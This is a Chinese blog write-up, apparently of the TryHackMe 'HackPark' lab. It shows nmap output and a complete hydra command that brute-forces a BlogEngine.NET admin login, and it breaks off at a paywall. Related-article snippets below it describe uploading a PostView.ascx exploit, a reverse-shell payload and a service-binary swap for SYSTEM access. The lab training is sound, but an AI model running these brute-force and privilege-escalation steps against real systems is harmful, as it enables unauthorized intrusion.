Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)

最新推荐文章于 2024-09-16 22:00:38 发布
最新推荐文章于 2024-09-16 22:00:38 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106355845
版权

1 扫描

主要就是80进web搜集信息

C:\root> nmap -A 10.10.16.216
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
C:\root> nmap -A 10.10.16.216 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Nmap scan report for 10.10.16.216
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  tcpwrapped
|_ssl-date: 2020-05-26T05:56:29+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

2 hydra

没找到什么价值东西
dirbuster扫到登录框
在这里插入图片描述
没有账号信息提示文件,sql注入也难搞。hydra跑跑看看,然后边等结果,边继续搜集其他信息。

keep me logged in那里打勾,然后随便输
burp抓包,再根据burp的抓包数据从而写这个hydra命令。账号就先猜admin
建议参考我的这个命令。
我先前试了很多次都跑不出来,跑出来16个莫名其妙的,我在论坛里看也有很多人是这种情况。
最后这个才ok

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.216 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=d%2B8KY5CoALVVu3cyx1zQBa5HJIO%2B%2BuZdB%2F%2BI60ddHdGPMLjeczLW8wG6%2F3cxgyyj17FxjLlJy7Twjwl9N1TRQeynyuc%2F5RKomk5MP%2FpeLy5wQ2c%2B7weG4x4uHWQiN%2FQF4LIxVWckJ9JJ917ffDnhcNkWhEBiW8q3eZ19lK2WyzCRq7S2DZkFFNMnsXpVs7at1VNHuoutNFwFg%2BVI37N6HIkOx5Qt328mR7vR7ebWV06at%2FS%2BsdWUqSKUoYuhr9OqGbzaUlh%2FnjLqzUm7SFRA1L5C8PIZwaoyXGbiL7eASUHrj8s6vV%2FeiHbGYe5qsDWUSyQ%2BC2n0ElFVOIz403nfU7lhvpxR3XtPJgq5UHAn%2ByWx57H7&__EVENTVALIDATION=1XEVJ1TGaBbiR0C2cHb0tUPm%2F1h0aH5m0aXu8WckU4cPKPYBmRLiAqA2YXBqXGokg%2FhfrQi0VwT0Hq88Tkye8%2B5IB%2FtOYN5QvJ%2Fcr5XMLS4etWgbMuTiY%2FFYogM1B6Rn9WbdAh%2FRXUPQEDcxHvLHDKyyIS09lavR7XBTiUvPVfzqMMDv&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

在这里插入图片描述
进入后,看到版本

最低0.47元/天 解锁文章
冬萍子
关注
Tryhackme -Skynet(考点:smb & 密码爆破 & cuppa RFI & cronjob - tar提权
冬萍子癸水
05-27 560
1 扫描 忘了截图了,就是445 smb和80http,一个进去找敏感文件,另一个进去搜集信息。 2 web信息搜集 gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64 松鼠邮件那个进去后是登录框。但是不知道密码 3 smb利用 enum4linux -a Ip地址 看到有俩处,匿名的当然可以进,mile那个没密码。 进匿名看,再log里,看到很多密码似的,保存下来,可
vulnhub - zico2(考点: LFI & phpliteadmin & tar/zip 提权 & 版本提权
冬萍子癸水
04-26 571
https://www.vulnhub.com/entry/zico2-1,210/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很常规,22想到可能的ssh登录,80是进web搜集信息 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-...
tryhackme
03-08
tryhackme
TryHackMe - HackPark
Yin520的博客
03-27 852
使用 Hydra 暴力破解网站登录页面,识别并使用公开漏洞,然后提升您在此 Windows 计算机上的权限!
TryHackMe 第1天 | Introduction to Cyber Security
最新发布
weixin_43831376的博客
09-16 1268
偶然之间了解到了TryHackMe这个网站,尝试跟着其中的学习路径进行学习,发现还是挺适合入门网络安全这一领域的。但是这个网站包含了很多内容,如果不用一些东西记录下来,那么很容易忘记,所以打算在此记录一下学习过程。目前因为刚开始,学习路径中的内容都还比较基础,有些内容之前我也了解,但是“温故而知新”,所以也就打算快速过一遍,复习的同时也进行一些查漏补缺。由于网站里的所有内容都是英文,因此都是借助翻译软件和自己的理解来翻译的,可能有不太准确的地方。
Try Hack Me-HackPark
v2ish1yan的博客
01-04 319
把之前生成的shell.exe上传到这里,改名为Message.exe,然后再开启一个监听,就可以得到system权限的shell。我们可以生成一个反弹shell载荷,让目标主机下载下来,然后让他执行这个载荷,就可以反弹shell了。按照要求,改一下exp里的ip和port,把文件名改为PostView.ascx,然后再上传。等他执行我们上传上去的恶意Message.exe后,就可以得到system权限的shell。所以这里提权的方式是,修改系统服务对应的二进制文件,将其修改为我们的攻击载荷,即上面的。
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3798
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
hydra-battles:上柯比&巴黎水螅战斗的变型和其他娱乐数学在Coq的(协同,形成文件,包括练习)[维护者= @ Casteran]
03-27
opam install coq-hydra-battles.opam --deps-only得到九头蛇战斗的依赖; opam install coq-addition-chains.opam --deps-only得到加法链的依赖。 常规Makefile位于顶层目录中: 制作:勒柯克脚本编译 化妆PDF:...
vulnhub- Symfonos 2 (考点:smb & ProFTPD & 端口转发 & librenms & mysql提权
冬萍子癸水
04-27 645
https://www.vulnhub.com/entry/symfonos-2,331/ nat网络 arp-scan -l 比平常扫出来多的ip就是靶机 nmap 看到21要想到ftp进去找敏感文件。但这里明显提示了proftpd的版本,1.3.5的是有漏洞的。 参考这个类似的靶机joy 22要想到可能的ssh登录或破解 80进web搜集信息 139,445smb进去找敏感文件 PORT ...
tryhackme--Blog
qq_45414878的博客
11-15 404
tryhackme–Tony the Tiger
TryHackMe-笔记:我的TryHackMe笔记
02-23
TryHackMe-注意事项 我的TryHackMe笔记 随时阅读:)
tryhackme--Wgel CTF
qq_45414878的博客
10-23 439
tryhackme--Wgel CTFnmapid_rsa信息泄漏wget的sudo提权 nmap 简单扫描靶机的服务 nmap -T4 -sS -sV 10.10.247.24 深度扫描也没没有什么可以直接利用的漏洞 目标机器为linux主机,并且目标主机开放了两个端口:22、80。 端口 服务 22 ssh 80 http id_rsa信息泄漏 访问80端口,发现为apache的默认页面,查看页面源代码,发现一句很有趣的话,其中 Jessie 可能为用户名 用dirsear
Tryhackme-Wonderland
个人博客
09-14 536
Wonderland 文章目录WonderlandWonderlandTask1 Capture the flagsPerlCapabilitiesLooking GlassTask1 Looking Glass Wonderland Task1 Capture the flags nmap扫描发现开启22端口和80端口 80端口进行目录扫描,未发现突破口 下载/img/white_rabbit_1.jpg,使用steghide提取隐藏文件,得到提示follow the r a b b i t,尝试访
TryHackMe - Archangel靶场
z4yn:)的博客
02-22 318
Archangel Boot2root, Web exploitation, Privilege escalation, LFI 0x01 信息收集 常规端口扫一波,发现只有22和80端口开放 先从80端口入手,常规的扫目录没有发现有价值的东西 在源代码里发现一个可以的域名 网站找不到突破口,试着修改本地的hosts文件指向改域名,访问后获得第一个flag 在用gobuster扫描网站目录,得到test.php和robots.txt robots....
TryHackMe - Tony the Tiger靶场
z4yn:)的博客
03-09 223
Tony the Tiger Learn how to use a Java Serialisation attack in this boot-to-root CVE-2015-7501 0x01 信息收集 先用Nmap扫描目标机端口,开放了不少端口。 任务1是到80端口拿一个flag 80端口搭建一个博客,常规扫目录没有发现有价值的东西。 查看页面源代码也没有发现线索,只剩下两篇博客的两张配图了 wget 把两张图片下载下来用steghide进行提取 ...
TryHackMe - Kenobi,全球最火的程序员学习路线
m0_60721860的博客
04-06 684
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 588
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
TryHackMe - Steel Mountain
Yin520的博客
03-23 818
侵入一台 Windows 机器。使用metasploit进行初始访问,并利用powershell进行Windows权限提升枚举,并学习一种新技术来获得管理员访问权限。
RemObjects Hydra教程:打造Delphi与.NET插件的综合指南
资源摘要信息: "HydraTutorial是一个教学资源,旨在指导用户如何使用RemObjects Hydra工具来开发集成Delphi和.NET技术的应用程序。RemObjects Hydra是一个插件框架,它允许开发者在同一个应用程序中结合使用Delphi和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值